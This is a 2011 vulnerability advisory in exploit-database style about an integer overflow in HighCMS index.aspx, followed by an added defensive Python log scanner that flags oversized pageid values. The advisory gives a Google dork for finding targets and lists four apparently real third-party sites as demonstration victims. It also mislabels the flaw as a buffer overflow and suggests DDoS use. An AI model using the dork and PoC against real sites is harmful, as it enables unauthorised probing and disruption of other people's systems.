----------------------------------------------------------------
HighCMS <= (index.aspx) Buffer Overflow Vulnerability
----------------------------------------------------------------

# Exploit Title: HighCMS <= (index.aspx) Buffer Overflow Vulnerability
# Google Dork: inurl:index.aspx?siteid=1&pageid=
# Application Name: [HighCMS]
# Date: 2011-10-30
# Author: BHG Security Center
# Home: Http://black-hg.org
# Software Link: [ http://www.aryanic.com/products-highcms.html ]
# Vendor Response(s): They didn't respond to the emails.
# Version: [ 11.6 ]
# Impact : [ Low ]
# Tested on: [Windows Server 2003 /IIS 6.0]
# CVE : Webapps

+-----------------------+
|  Overflow Exception   |
+-----------------------+

Description: Many of these vulnerabilities can be used for DDoS attacks, including refref

# PoC(s):

http://[HOST]/index.aspx?siteid=1&pageid=[Overflow]
http://[HOST]/index.aspx?siteid=1&pageid=4141414141 <> True

# Demo(s):

http://www.mayadin.biz/index.aspx?siteid=1&pageid=4141414141
http://ielts-house.com/index.aspx?siteid=1&pageid=4141414141
http://www.persiangoldfish.com/index.aspx?siteid=1&pageid=414141414141
http://honarnews.org/index.aspx?siteid=1&pageid=4141414141

# Output Data:

[OverflowException: Arithmetic operation resulted in an overflow.]
   Microsoft.VisualBasic.CompilerServices.Conversions.ToInteger(String Value) +165
   highcms.index.page_select() +1272
   highcms.index.make_page() +2304
   highcms.index.Page_Load(Object , EventArgs ) +8725
   System.Web.UI.Control.OnLoad(EventArgs e) +132
   System.Web.UI.Control.LoadRecursive() +66
   System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2428

# Reference:

[1] For more information about this vulnerability (URL: http://msdn.microsoft.com/en-us/library/system.overflowexception.aspx)
[2] For more information about this vulnerability (URL: https://www.owasp.org/index.php/Buffer_Overflows)

# Important Notes:

- The vendor did not respond to email or phone. As there is no contact form or email address on the website, we used all the email addresses found by searching Google, such as support, info, and so on.

# Greets To :

Net.Edit0r ~ A.Cr0x ~ 3H34N ~ 4m!n ~ Cyrus ~ tHe.k!ll3r ~ 2MzRp
ArYaIeIrAn ~ Mikili ~ NoL1m1t ~ cmaxx ~ G3n3Rall ~ Mr.XHat ~ cmaxx
G3n3Rall ~ Mr.XHat ~ M4hd1 ~ Cru3l.b0y ~ HUrr!c4nE ~ r3v0lter
s3cure.p0rt ~ THANKS TO ALL Iranian HackerZ ./Persian Gulf

===========================================[End]=============================================
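
The PoC value 4141414141 exceeds 2147483647, the largest value of the 32-bit Integer that Conversions.ToInteger in the stack trace returns, which is why the unhandled OverflowException appears. The following is an added example, not part of the original advisory or of HighCMS: it scans IIS W3C log lines for index.aspx requests whose pageid is not a plain decimal within that range. The log lines, IP addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qs

INT32_MAX = 2**31 - 1  # 2147483647, upper bound of a .NET Integer (Int32)


def classify_pageid(value):
    """Return 'ok', 'out_of_range' or 'not_numeric' for a raw pageid string."""
    if not re.fullmatch(r"[0-9]+", value):
        return "not_numeric"
    digits = value.lstrip("0") or "0"
    # Length check first so absurdly long digit runs are never converted.
    if len(digits) > 10 or int(digits) > INT32_MAX:
        return "out_of_range"
    return "ok"


def scan(lines, path="/index.aspx"):
    """Yield (client ip, pageid, verdict, status) for suspicious requests."""
    fields, hits = [], []
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names declared by the log itself
            continue
        if line.startswith("#") or not line.strip() or not fields:
            continue
        rec = dict(zip(fields, line.split()))
        if rec.get("cs-uri-stem", "").lower() != path:
            continue
        query = parse_qs(rec.get("cs-uri-query", ""), keep_blank_values=True)
        for value in query.get("pageid", []):
            verdict = classify_pageid(value)
            if verdict != "ok":
                hits.append((rec.get("c-ip"), value, verdict, rec.get("sc-status")))
    return hits


# Constructed sample log (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2011-10-30 10:00:01 GET /index.aspx siteid=1&pageid=12 192.0.2.10 200
2011-10-30 10:00:05 GET /index.aspx siteid=1&pageid=4141414141 198.51.100.7 500
2011-10-30 10:00:06 GET /index.aspx siteid=1&pageid=2147483647 192.0.2.10 200
2011-10-30 10:00:09 GET /index.aspx siteid=1&pageid=abc 198.51.100.7 500
2011-10-30 10:00:11 GET /default.aspx - 192.0.2.11 200
""".splitlines()

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The same range check belongs in the application itself before the conversion, with a generic error page configured so that stack traces like the one above are not returned to clients.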